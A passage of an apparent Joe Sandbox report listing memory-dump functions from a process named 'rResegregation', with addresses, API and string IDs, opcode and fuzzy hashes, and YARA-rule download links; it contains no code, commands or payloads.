                                                                  • Opcode ID: 79587476a169fcd5c9685fc4d0bb148336d64b4e33a7ecb4f40abee940fed5f6
                                                                  • Instruction ID: 0cb9883509d3dfeebeb912a5373eabfbdf632df87e81142134bddb50ecdd9be2
                                                                  • Opcode Fuzzy Hash: 79587476a169fcd5c9685fc4d0bb148336d64b4e33a7ecb4f40abee940fed5f6
                                                                  • Instruction Fuzzy Hash: FD312172650204AFE751CF24C888A6A7BA5EF49360F104669ED049F3A1DB35ED42CFD1
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 377B56E0 Relevance: 1.6, APIs: 1, Instructions: 92timeCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.28913776273.0000000037780000.00000040.00001000.00020000.00000000.sdmp, Offset: 37780000, based on PE: true
                                                                  • Associated: 00000002.00000002.28913776273.00000000378A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000002.00000002.28913776273.00000000378AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_37780000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID: DebugPrintTimes
                                                                  • String ID:
                                                                  • API String ID: 3446177414-0
                                                                  • Opcode ID: 6fcb27d5c25c462c8559daa383c1694a98114b785d94e853975932470da4e8f4
                                                                  • Instruction ID: fe60f57487e3867287ba049490db1f3177d4a50d0762d1657d39576c034b973f
                                                                  • Opcode Fuzzy Hash: 6fcb27d5c25c462c8559daa383c1694a98114b785d94e853975932470da4e8f4
                                                                  • Instruction Fuzzy Hash: D4317C35715A05FFEB558F65CE84BA9BBA6FF88390F405055E8008BA50DB35E931CB81
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 3785E750 Relevance: 1.6, APIs: 1, Instructions: 91timeCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.28913776273.0000000037780000.00000040.00001000.00020000.00000000.sdmp, Offset: 37780000, based on PE: true
                                                                  • Associated: 00000002.00000002.28913776273.00000000378A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000002.00000002.28913776273.00000000378AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_37780000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID: DebugPrintTimes
                                                                  • String ID:
                                                                  • API String ID: 3446177414-0
                                                                  • Opcode ID: a99ad449c06762c09007f1cc344041e9293de3abd5df207284796a68ebf072b5
                                                                  • Instruction ID: 8b9e43ec9804c02d49a2449dc4668cbf518bf0468db43d7d5df1096a45419aa6
                                                                  • Opcode Fuzzy Hash: a99ad449c06762c09007f1cc344041e9293de3abd5df207284796a68ebf072b5
                                                                  • Instruction Fuzzy Hash: BE3178B55093429FC700CF18C84894ABBE1FF9A368F0485AEE4889F211D731EE05CB96
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 377B3536 Relevance: 1.6, APIs: 1, Instructions: 84timeCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.28913776273.0000000037780000.00000040.00001000.00020000.00000000.sdmp, Offset: 37780000, based on PE: true
                                                                  • Associated: 00000002.00000002.28913776273.00000000378A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000002.00000002.28913776273.00000000378AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_37780000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID: DebugPrintTimes
                                                                  • String ID:
                                                                  • API String ID: 3446177414-0
                                                                  • Opcode ID: 05c2d9ed6439ccc161b975dac42bb20162f07d27e36aa8a727eefa9eea799f1e
                                                                  • Instruction ID: 7409d5ad787f2d1e341c2e4cb231be76e5700243c306c3cf9053a45cfdeef185
                                                                  • Opcode Fuzzy Hash: 05c2d9ed6439ccc161b975dac42bb20162f07d27e36aa8a727eefa9eea799f1e
                                                                  • Instruction Fuzzy Hash: 5521F0352056049FDB71DF14C984F1ABBA2EF89B28F420959E8410F790CBB4ED89CB92
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 377A92AF Relevance: 1.5, APIs: 1, Instructions: 35timeCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.28913776273.0000000037780000.00000040.00001000.00020000.00000000.sdmp, Offset: 37780000, based on PE: true
                                                                  • Associated: 00000002.00000002.28913776273.00000000378A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000002.00000002.28913776273.00000000378AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_37780000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID: DebugPrintTimes
                                                                  • String ID:
                                                                  • API String ID: 3446177414-0
                                                                  • Opcode ID: 7f19187c4cf11e3942b306f39fcd65e19fa8e322f8ae7775ce363368cf9890de
                                                                  • Instruction ID: 07ba3bda3c568b4c522ed6f5bd32ec9db882a55c4ddbc9bffc3b3234fa6354a3
                                                                  • Opcode Fuzzy Hash: 7f19187c4cf11e3942b306f39fcd65e19fa8e322f8ae7775ce363368cf9890de
                                                                  • Instruction Fuzzy Hash: 90F0FA32200600ABE331CB08CC08F9ABBFEEF84B10F040619E54697290DBA4F90ACA60
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 377EA580 Relevance: 1.4, Strings: 1, Instructions: 200COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.28913776273.0000000037780000.00000040.00001000.00020000.00000000.sdmp, Offset: 37780000, based on PE: true
                                                                  • Associated: 00000002.00000002.28913776273.00000000378A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000002.00000002.28913776273.00000000378AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_37780000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: GlobalTags
                                                                  • API String ID: 0-1106856819
                                                                  • Opcode ID: 0bf6b4ce0fe17087f3db9eaa11984675b17ae94cc21803cf23aff7edf6d288fb
                                                                  • Instruction ID: 84c213fd951c4aff792379652a2c51b325347a00162553fd2dd4527286e3880c
                                                                  • Opcode Fuzzy Hash: 0bf6b4ce0fe17087f3db9eaa11984675b17ae94cc21803cf23aff7edf6d288fb
                                                                  • Instruction Fuzzy Hash: A0716EB5F0030A9FEB14CF98D5807ADBBB1BF68361F10812AE805AB644EB359981DB54
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 377B965A Relevance: 1.4, Strings: 1, Instructions: 191COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.28913776273.0000000037780000.00000040.00001000.00020000.00000000.sdmp, Offset: 37780000, based on PE: true
                                                                  • Associated: 00000002.00000002.28913776273.00000000378A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000002.00000002.28913776273.00000000378AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_37780000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: @
                                                                  • API String ID: 0-2766056989
                                                                  • Opcode ID: cf001e69a80641a8cc3ed551a73227fc2f86a0353987b9bba849c8e96c1f93c2
                                                                  • Instruction ID: 1e9dfe1fccb2138a15a813e43e4edaaf16c347135d0c0ea228257c4b12e620dd
                                                                  • Opcode Fuzzy Hash: cf001e69a80641a8cc3ed551a73227fc2f86a0353987b9bba849c8e96c1f93c2
                                                                  • Instruction Fuzzy Hash: 2C614AB5D01219EBDF21CFA5C844BEEBBF9EF44764F104159E820AB290DB759A01CFA1
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 377C02F9 Relevance: 1.4, Strings: 1, Instructions: 184COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.28913776273.0000000037780000.00000040.00001000.00020000.00000000.sdmp, Offset: 37780000, based on PE: true
                                                                  • Associated: 00000002.00000002.28913776273.00000000378A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000002.00000002.28913776273.00000000378AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_37780000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: #%u
                                                                  • API String ID: 0-232158463
                                                                  • Opcode ID: 385d393f6c01be365b3b4aeda52eb3dbbf8fddf8262c21312ae2aa6c0ba505cb
                                                                  • Instruction ID: 98c21978a5173271b32476bec287b680bc6f167d4b0cebe0471d0af92d075e26
                                                                  • Opcode Fuzzy Hash: 385d393f6c01be365b3b4aeda52eb3dbbf8fddf8262c21312ae2aa6c0ba505cb
                                                                  • Instruction Fuzzy Hash: A0712D71A0024ADFDB05CFA8D984FAEB7F8EF18754F144065E905EB251EB38E941CBA1
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 3783F42F Relevance: 1.4, Strings: 1, Instructions: 161COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.28913776273.0000000037780000.00000040.00001000.00020000.00000000.sdmp, Offset: 37780000, based on PE: true
                                                                  • Associated: 00000002.00000002.28913776273.00000000378A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000002.00000002.28913776273.00000000378AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_37780000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: @
                                                                  • API String ID: 0-2766056989
                                                                  • Opcode ID: 9f61a4bdb5714a2bb9f6651e875168b777453bd48b0093045f8e61e884682dbf
                                                                  • Instruction ID: 459d14e975c3baf79fd58a885596329b77c7253cca2d724ea17678aa09b7459b
                                                                  • Opcode Fuzzy Hash: 9f61a4bdb5714a2bb9f6651e875168b777453bd48b0093045f8e61e884682dbf
                                                                  • Instruction Fuzzy Hash: 58519CB6505306EFE711CF18C944F6AB7E8FB94760F40092AF5449B290EB75EA14CBD2
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 377CE547 Relevance: 1.4, Strings: 1, Instructions: 148COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.28913776273.0000000037780000.00000040.00001000.00020000.00000000.sdmp, Offset: 37780000, based on PE: true
                                                                  • Associated: 00000002.00000002.28913776273.00000000378A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000002.00000002.28913776273.00000000378AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_37780000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: EXT-
                                                                  • API String ID: 0-1948896318
                                                                  • Opcode ID: 77c38ef18020aefacf99927bfb81a501f2f0269f376f520a5cd662608e5d02b7
                                                                  • Instruction ID: 3c62839a1ec6aa17a2e8d08f9845e24f213c19a5bfb9a45fe59386c2311f1c3f
                                                                  • Opcode Fuzzy Hash: 77c38ef18020aefacf99927bfb81a501f2f0269f376f520a5cd662608e5d02b7
                                                                  • Instruction Fuzzy Hash: B8415F725283129BD710DA65D944B6FB7E8AB8C758F400E3DF584EF180EBB8D9048797
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 3782C3B0 Relevance: 1.4, Strings: 1, Instructions: 129COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.28913776273.0000000037780000.00000040.00001000.00020000.00000000.sdmp, Offset: 37780000, based on PE: true
                                                                  • Associated: 00000002.00000002.28913776273.00000000378A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000002.00000002.28913776273.00000000378AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_37780000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: BinaryHash
                                                                  • API String ID: 0-2202222882
                                                                  • Opcode ID: e7a0b9333f72c9e12255ce8c5db3dbabc93f5508b540e1bc282051d7a2928cc0
                                                                  • Instruction ID: fb84f1fd7ae377ee4a5f2f5d78021c09d187673f581afd6f58a24d1dd2687d32
                                                                  • Opcode Fuzzy Hash: e7a0b9333f72c9e12255ce8c5db3dbabc93f5508b540e1bc282051d7a2928cc0
                                                                  • Instruction Fuzzy Hash: 384163F2D0052CAFDB21DA54CC84FEE77BDAB54714F0045E5EA08AB240DB359E889FA5
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 377B07A7 Relevance: 1.4, Strings: 1, Instructions: 128COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.28913776273.0000000037780000.00000040.00001000.00020000.00000000.sdmp, Offset: 37780000, based on PE: true
                                                                  • Associated: 00000002.00000002.28913776273.00000000378A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000002.00000002.28913776273.00000000378AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_37780000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: z7
                                                                  • API String ID: 0-4178637671
                                                                  • Opcode ID: 0aaeab9a4e73e38b88a2965bdde7503350fbae69c588374244659628cf05b32b
                                                                  • Instruction ID: af5c027c44fd565812a761b4f29178c524af9e74c1fa7f5fc1c85f3dce2e87a6
                                                                  • Opcode Fuzzy Hash: 0aaeab9a4e73e38b88a2965bdde7503350fbae69c588374244659628cf05b32b
                                                                  • Instruction Fuzzy Hash: 68419FB16047059FEB34CF28C884A22B7F9FF48354B504A7DE4568BA50EB35FA56CB90
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 37839429 Relevance: 1.4, Strings: 1, Instructions: 121COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.28913776273.0000000037780000.00000040.00001000.00020000.00000000.sdmp, Offset: 37780000, based on PE: true
                                                                  • Associated: 00000002.00000002.28913776273.00000000378A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000002.00000002.28913776273.00000000378AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_37780000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: verifier.dll
                                                                  • API String ID: 0-3265496382
                                                                  • Opcode ID: dcbd37a2862d57db14b43f6b9d4478b525395f984a8fc024173bd1bb3373ffb1
                                                                  • Instruction ID: 52cc1b5361bdd7da652a25bb5755c77f23928a88f27ec47e2b9abab537bfedc4
                                                                  • Opcode Fuzzy Hash: dcbd37a2862d57db14b43f6b9d4478b525395f984a8fc024173bd1bb3373ffb1
                                                                  • Instruction Fuzzy Hash: A931A5B9602302AFF7148F2DD851B6677F5EB68368F90806AE509DF381E6359DC28790
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 377E7425 Relevance: 1.4, Strings: 1, Instructions: 111COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.28913776273.0000000037780000.00000040.00001000.00020000.00000000.sdmp, Offset: 37780000, based on PE: true
                                                                  • Associated: 00000002.00000002.28913776273.00000000378A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000002.00000002.28913776273.00000000378AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_37780000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: #
                                                                  • API String ID: 0-1885708031
                                                                  • Opcode ID: 6965cac1e13bd5fab6b18dc40a87e1d3c4b851185aea300bbcdbc7d08ff272ce
                                                                  • Instruction ID: 138a8bc3275a9b453f79200d41c2f65663e4c8aec0160691ed79e48cd18e7a8b
                                                                  • Opcode Fuzzy Hash: 6965cac1e13bd5fab6b18dc40a87e1d3c4b851185aea300bbcdbc7d08ff272ce
                                                                  • Instruction Fuzzy Hash: C941CE75A0061A9FDB11CF88C880BFEBBB9EF45751F00445EE945AB600DB34AD41C7E2
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 377E360F Relevance: 1.4, Strings: 1, Instructions: 106COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.28913776273.0000000037780000.00000040.00001000.00020000.00000000.sdmp, Offset: 37780000, based on PE: true
                                                                  • Associated: 00000002.00000002.28913776273.00000000378A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000002.00000002.28913776273.00000000378AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_37780000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: Flst
                                                                  • API String ID: 0-2374792617
                                                                  • Opcode ID: a7d2355cd7c07a9917a1efee9b5babeecc8ff266f6e7933bb15866b4dcf6bacf
                                                                  • Instruction ID: ed8ff5bb37255eefd7b632928d27390cd7cf6182db30bbe238db8cb90d9b8e9f
                                                                  • Opcode Fuzzy Hash: a7d2355cd7c07a9917a1efee9b5babeecc8ff266f6e7933bb15866b4dcf6bacf
                                                                  • Instruction Fuzzy Hash: 3041ABB1605301DFD304CF28C580B26FBE9EB49728F62856EE4588F341DB71D886CB92
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 3782C6F2 Relevance: 1.3, Strings: 1, Instructions: 94COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.28913776273.0000000037780000.00000040.00001000.00020000.00000000.sdmp, Offset: 37780000, based on PE: true
                                                                  • Associated: 00000002.00000002.28913776273.00000000378A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000002.00000002.28913776273.00000000378AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_37780000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: BinaryName
                                                                  • API String ID: 0-215506332
                                                                  • Opcode ID: 69cec959e71b8072056da79aa5ce092dae979b31aabfbbb2662edd52d3701646
                                                                  • Instruction ID: d5e3c585739d8fc10831498f6ff6db403e44e79bdffb9992bdc5093c5d6ffdb4
                                                                  • Opcode Fuzzy Hash: 69cec959e71b8072056da79aa5ce092dae979b31aabfbbb2662edd52d3701646
                                                                  • Instruction Fuzzy Hash: 0731037A90060AAFEB15EE5CC845E7FB7B4EB94720F114129E800AB250DB329E40E7E0
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 377DB1E0 Relevance: .6, Instructions: 629COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.28913776273.0000000037780000.00000040.00001000.00020000.00000000.sdmp, Offset: 37780000, based on PE: true
                                                                  • Associated: 00000002.00000002.28913776273.00000000378A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000002.00000002.28913776273.00000000378AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_37780000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 7ff3b41fa4c46f098083962b07d371d2d22cc858b14193a800da73b65aadae18
                                                                  • Instruction ID: 1a509ab8c8f4649535e35eef35c847dcd49d18f19989ad51d49e5d407c7f215d
                                                                  • Opcode Fuzzy Hash: 7ff3b41fa4c46f098083962b07d371d2d22cc858b14193a800da73b65aadae18
                                                                  • Instruction Fuzzy Hash: B33292B5E00219DBDF14CFA8C988BAEBBB2FF54754F140069E805AB390E735A911CF91
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 377C2760 Relevance: .6, Instructions: 605COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.28913776273.0000000037780000.00000040.00001000.00020000.00000000.sdmp, Offset: 37780000, based on PE: true
                                                                  • Associated: 00000002.00000002.28913776273.00000000378A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000002.00000002.28913776273.00000000378AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_37780000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: ff0b2bdd81b80c85249d9640251d7dee6051726439b5970ad3daf8f442fb4fd9
                                                                  • Instruction ID: 6c4a8433c5eece7ef019926b3be0746bbbfe5548dfa77b5c7dfb00e1b5889d26
                                                                  • Opcode Fuzzy Hash: ff0b2bdd81b80c85249d9640251d7dee6051726439b5970ad3daf8f442fb4fd9
                                                                  • Instruction Fuzzy Hash: 4732FE78B007598FEB14CF69C8507AEBBF2BF98754F20852DD4859B684DB38A842CF51
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 3787124C Relevance: .6, Instructions: 571COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.28913776273.0000000037780000.00000040.00001000.00020000.00000000.sdmp, Offset: 37780000, based on PE: true
                                                                  • Associated: 00000002.00000002.28913776273.00000000378A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000002.00000002.28913776273.00000000378AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_37780000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 1300784cf94cf2e05e9f536f7f73d05b15611ceaedfb3379d34a3520310e6369
                                                                  • Instruction ID: bccaada9516a725d054fc3a3941fe3be2ca34b36fa4f46bb5215a6336d1db8e5
                                                                  • Opcode Fuzzy Hash: 1300784cf94cf2e05e9f536f7f73d05b15611ceaedfb3379d34a3520310e6369
                                                                  • Instruction Fuzzy Hash: 3D22AF74E00256CFDB09CF58C480AAAB3B2BFD9354F14816DD856EB784EB34E942CB91
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 377A8347 Relevance: .4, Instructions: 380COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.28913776273.0000000037780000.00000040.00001000.00020000.00000000.sdmp, Offset: 37780000, based on PE: true
                                                                  • Associated: 00000002.00000002.28913776273.00000000378A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000002.00000002.28913776273.00000000378AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_37780000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 29441375e0a147e174e4bab400268ad855fe755657b8c0ac330d3716329b03c5
                                                                  • Instruction ID: aa1626723e5de078b1f3f4261822b139d04225391993fafb661a97c347f59b18
                                                                  • Opcode Fuzzy Hash: 29441375e0a147e174e4bab400268ad855fe755657b8c0ac330d3716329b03c5
                                                                  • Instruction Fuzzy Hash: 06D10E71A007069BFB45CF68CC80BBA77B1AF64758F594229E811DF380EB34EA45DB91
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 377BD700 Relevance: .3, Instructions: 342COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.28913776273.0000000037780000.00000040.00001000.00020000.00000000.sdmp, Offset: 37780000, based on PE: true
                                                                  • Associated: 00000002.00000002.28913776273.00000000378A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000002.00000002.28913776273.00000000378AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_37780000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: fd7d910d8807f7641ea8749215292788345cce1ff518f19dffd9f8ea404cebb3
                                                                  • Instruction ID: 7b83d39cedac930952e9814bf6180441f9871b8b3496129c124743629b32163b
                                                                  • Opcode Fuzzy Hash: fd7d910d8807f7641ea8749215292788345cce1ff518f19dffd9f8ea404cebb3
                                                                  • Instruction Fuzzy Hash: 3DC1C275E003169FEF28CF59C840BAEB7B6EF58324F548669E814AB780D774E941CB80
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 377F1763 Relevance: .3, Instructions: 322COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.28913776273.0000000037780000.00000040.00001000.00020000.00000000.sdmp, Offset: 37780000, based on PE: true
                                                                  • Associated: 00000002.00000002.28913776273.00000000378A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000002.00000002.28913776273.00000000378AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_37780000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 8f690b70ac4355a0337f7105d310e22b276138cf72360fd93015a7393b95809b
                                                                  • Instruction ID: 8928bd9ec45d4819c76c2df953a3b5b8ff5a8f9d97fe880bf732cc733c8589b5
                                                                  • Opcode Fuzzy Hash: 8f690b70ac4355a0337f7105d310e22b276138cf72360fd93015a7393b95809b
                                                                  • Instruction Fuzzy Hash: F2D114B59002059FDB41CF68CA84B9A7BF9BF08350F1440BAED09AF316DB35E945CBA0
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 377CF380 Relevance: .3, Instructions: 321COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.28913776273.0000000037780000.00000040.00001000.00020000.00000000.sdmp, Offset: 37780000, based on PE: true
                                                                  • Associated: 00000002.00000002.28913776273.00000000378A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000002.00000002.28913776273.00000000378AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_37780000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 0a15e211a4aeebfef03411d648f846aac7eced1dc173c17d68cbeec4a581749b
                                                                  • Instruction ID: 8afe5ff38df1d72b6c17fdaea23ea71eea4f8cb51a955c37407351eaa13d6911
                                                                  • Opcode Fuzzy Hash: 0a15e211a4aeebfef03411d648f846aac7eced1dc173c17d68cbeec4a581749b
                                                                  • Instruction Fuzzy Hash: 6DC102B6B01226CBEB04CF18C890B7977B2FB4C750F564199EA419F399DB349A43CB60
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 377B37E4 Relevance: .3, Instructions: 303COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.28913776273.0000000037780000.00000040.00001000.00020000.00000000.sdmp, Offset: 37780000, based on PE: true
                                                                  • Associated: 00000002.00000002.28913776273.00000000378A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000002.00000002.28913776273.00000000378AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_37780000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 66f8d7fe1680de6ef901918f85ea68a6143efe4e0f5f62a89bc0ed58f90ecdc3
                                                                  • Instruction ID: c12bfa478ff5257c6e404439e6dd7c98cd229f5516246d2fbf1ce524d938289b
                                                                  • Opcode Fuzzy Hash: 66f8d7fe1680de6ef901918f85ea68a6143efe4e0f5f62a89bc0ed58f90ecdc3
